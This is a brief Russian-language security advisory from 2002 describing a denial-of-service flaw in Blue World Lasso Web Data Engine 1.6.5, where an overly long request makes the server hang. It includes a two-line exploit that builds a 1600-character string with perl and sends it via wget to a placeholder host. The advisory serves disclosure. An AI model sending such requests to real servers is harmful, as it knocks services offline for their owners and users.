Удаленный DoS против Lasso Web Data Engine

Дата публикации:
18.02.2002
Всего просмотров:
759
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Lasso Web Data Engine – Web приложение, позволяющее разработчикам обслуживать базу данных в управляемых сайтах.

При передаче необычно длинного запроса, Web Data Engine зависнет и перестанет отвечать на законные запросы

Эксплоит:

export ATTACK=`perl -e "print 'A' x 1600"`

wget http://site.com/$ATTACK.

Уязвимость найдена в Blue World Lasso Web Data Engine 1.6.5

Ссылки: Источник
http://www.blueworld.com/blueworld/products/LassoWDE3.6/Overview.html

или введите имя

CAPTCHA